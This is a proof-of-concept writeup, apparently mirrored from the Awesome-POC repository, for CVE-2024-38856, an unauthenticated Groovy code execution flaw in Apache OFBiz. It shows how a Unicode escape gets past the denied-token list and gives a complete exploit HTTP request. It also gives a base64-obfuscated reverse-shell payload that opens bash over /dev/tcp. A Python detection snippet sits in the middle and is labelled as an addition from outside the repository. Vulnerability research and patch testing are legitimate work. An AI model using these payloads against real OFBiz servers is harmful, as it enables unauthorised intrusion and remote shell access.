mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-04 18:27:48 +00:00
# Apache OFBiz Authentication Bypass Leading to Remote Code Execution (CVE-2024-38856)

## Vulnerability Description

Apache OFBiz is an open-source enterprise resource planning (ERP) system. It provides a suite of enterprise applications for integrating and automating many of an organization's business processes.

This vulnerability stems from an incomplete fix for CVE-2023-51467. In Apache OFBiz 18.12.11 the developers believed they had fixed that vulnerability, but they had only closed one of its exploitation paths. The Groovy expression injection remained, allowing unauthenticated users to execute arbitrary commands on the server.

References:

- https://github.com/apache/ofbiz-framework/commit/31d8d7
- https://forum.butian.net/article/524
- https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz
- https://issues.apache.org/jira/browse/OFBIZ-13128

## Affected Versions

```
Apache OFBiz < 18.12.14
```

## Network Mapping

```
app="Apache_OFBiz"
```

## Environment Setup

Start an Apache OFBiz 18.12.10 server with Vulhub by running the following command:

```
docker compose up -d
```

After waiting a few minutes, browse to `https://your-ip:8443/accounting`; if the login page appears, the environment is up.

If the server is not accessed via localhost, the request headers must include `Host: localhost`; otherwise the following error is returned:

```
ERROR MESSAGE
org.apache.ofbiz.webapp.control.RequestHandlerException: Domain your-ip not accepted to prevent host header injection.
```

## Vulnerability Reproduction

Apache OFBiz denies the following keywords in submitted Groovy code; the check can be bypassed with Unicode escapes, for example `\u0065xecute`:

```
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
execute,println,calc,touch,calculate
```
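The reason the escape works is that the denied-token list is matched against the raw source text, while the Groovy compiler resolves `\uXXXX` escapes before it sees identifiers. As an added example (not code from the Awesome-POC repository or from OFBiz), the following defender-side check decodes those escapes before matching, so the escaped form is caught; the token subset, the case-insensitive comparison and the repeated decoding rounds are assumptions made here.

```python
import re

# Subset of the deniedWebShellTokens list quoted above (constructed subset).
DENIED_WEBSHELL_TOKENS = [
    "java.", "exec(", "eval(", "runtime", "process", "execute", "println", "system",
]

# Java/Groovy lexical escape: a backslash, 'u', then four hex digits.
_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_unicode_escapes(text: str, max_rounds: int = 3) -> str:
    """Resolve \\uXXXX escapes to the characters they denote.

    Runs a few rounds so that an escape which itself decodes to a backslash
    (e.g. \\u005cu0065 -> \\u0065 -> e) is also resolved; a single pass
    would leave the second layer in place.
    """
    for _ in range(max_rounds):
        decoded = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
        if decoded == text:
            break
        text = decoded
    return text


def find_denied_tokens(payload: str, normalize: bool = True) -> list:
    """Return the denied tokens present in the payload.

    Comparison is case-insensitive (an assumption here). With
    normalize=False this mirrors a literal substring check, which the
    escaped identifier slips past; with normalize=True the escapes are
    decoded first, so the match sees the same text the compiler sees.
    """
    haystack = decode_unicode_escapes(payload) if normalize else payload
    haystack = haystack.lower()
    return [tok for tok in DENIED_WEBSHELL_TOKENS if tok.lower() in haystack]


# The groovyProgram body from the request quoted on this page.
SAMPLE = "throw new Exception('id'.\\u0065xecute().text);"

if __name__ == "__main__":
    print(find_denied_tokens(SAMPLE, normalize=False))  # literal check: nothing found
    print(find_denied_tokens(SAMPLE))                   # after decoding: ['execute']
```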

Sending the following request executes the `id` command through a Groovy script:

```
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 190

------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"

throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
```

Reverse shell payload:

```
throw new Exception('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'.\u0065xecute().text);
```

## Remediation

Upgrade to version 18.12.16 or later.